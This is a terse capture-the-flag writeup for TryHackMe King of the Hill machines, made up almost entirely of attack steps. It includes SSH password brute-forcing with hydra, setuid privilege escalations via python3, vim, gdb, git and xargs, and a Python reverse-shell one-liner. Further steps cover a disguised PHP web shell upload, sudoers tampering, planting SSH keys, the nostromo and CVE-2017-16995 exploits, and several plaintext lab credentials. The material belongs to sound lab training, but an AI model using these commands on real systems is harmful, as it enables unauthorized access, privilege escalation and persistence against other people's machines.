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TryHackMe King of the Hill (KOTH) writeup


ssh shifu@$IP password: batman

sudo -l


msfconsole -> eternalblue


use anonymous login on ftp. You will have a note saying that there is users with weak passwords.

only one of them is actually weak so time to hydra'ate.

hydra ssh://$IP -l rcampbell -P ../../res/rockyou.txt -t 64 and use the creds to ssh.

-t 64 is allowed here. Ignore -t 4 warning.

Now time to check capabilities. getcap -r / 2> /dev/null.

Oh python3 has setuid. Gotcha. Use python3 -c 'import os,pty; os.setuid(0); pty.spawn("/bin/bash")'

boom. You are root.


on oprt 80 -> admin:niceWorkHackerm4n

then on shell use python3 revshell python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);'

then change to admin user using ssh admin@localhost -t "bash --noprofile"

change PATH with export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:

then use sudo chmod +s /bin/bash && /bin/bash -p

then fdisk -l to list mounts

then mount it with sudo mount /dev/xvda1 /mnt

(phoenix/.ssh/ append to local authorized_keys then try to ssh into that account

then just sudo to root.


check the robots.txt file on port 80, it will give endpoint which will give ssh key for shrek user

ssh -i id_rsa shrek@$IP

then use SUID for gdb and get root.

change to proper root through changing the sudoers(Don't forget to change file permissions of sudoers)


get the base64 from nc $IP 3333

Convert that hash to file from online or anything.

use fcrackzip -v -u -D -p ../../res/rockyou.txt to get the passcode of zip.

Then use unzip with passcode to get creds.txt

use this creds to ssh

then use xargs from gtfobins for SUID to get root.

Then use same sudoers technique to gain real root instead effective root.


there is a direct shell access on port 46969

use telnet $IP 46969

You will be given user:password but they are ciphered with ceaser cipher. After decoding it is food:givemecookies

now vim.basic is a SUID. Use it to change /etc/sudoers and add food to run everything.

now sudo su with password or You can use NOPASSWD: ALL in /etc/sudoers too

DON"T forget to remove sudo privilleges from food once you get the root.


FORGET EVRYTHING AND RUN nmap scan and get the ports of the machine.

run nmap -p- -vvv -sV $IP or if you are really late then nmap -p-20000 -vvv -sV $IP

Better solution is to use browser based machine of thm. It will be life saver.

then login to ftp with anonymous and cd into cd .../...

you will have hidden .zip file. use fcrackzip -v -u -D -p ../../res/rockyou.txt to crack password.

you will get ssh credentials for machine in boot/.pass it was this one in last attempt neville:6mvv5yrw5ir55njoo45cf62l7. Now ssh is on different port so that's why nmap scan is required.

Then it is just SUID.


On pert 80 webpage check /betatest which will show /etc/passwd so we get the username narrator.

now use smbclient \\\\$IP\public and get the alert.txt which includes the password for the user.

now use /usr/bin/vim -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")' as vim is SUID binary.

Now classic change the /etc/sudoers to get the proper root.


On port 82 use burpsuit to upload the shell.gif.php by changing the content type image/gif.

Get the reverse shell, now add your to /home/duku/.ssh/authorized_keys and ssh into duku.

now go to /tmp/tmux-0, Now we will use already running tmux session and tap into it to become root.

use tmux -S default attach -t default

Now for the king.txt, it is attributed to append only mode. use echo PhoenixCreation >> /root/king.txt.


ftp $IP use anonymous login and get the id_rsa.

then chmod 600 id_rsa and ssh -i id_rsa ashu@$IP

then use sudo /bin/su skidy to become skidy.

then use sudo /bin/git -p help config and then !/bin/sh to get the root.

On port 9001, use nc $IP 9001 with password yourmom! to get ashu's shell.

On port 9002, use nc $IP 9002 to get direct root shell but it is restricted.


on port 8080 there is nostromo runnning which is exploitable through python script.

Get the exploit by searchsploit -m multiple/remote/ Comment the cve-2019 part in code. there is problem in it.

then run python2 $IP 8080 "mkdir /home/gloria/.ssh; echo '<>' > /home/gloria/.ssh/authorized_keys"

now ssh gloria@IP

this is where another exploit comes in picture.

Get the .c file and compile it with gcc --static cve-2017-16995.c -o exploit && chmod +x exploit

now you are root. change the passwd and ssh into root for better expierence.


Find flags easily: find / -name *flag*.txt -exec cat "{}" \; 2> /dev/null | egrep -i 'THM' (Also you can use just *flag* but it would be bit slower.)


All hacking resources. Some things are really shouldn't be here but I have to have them here.







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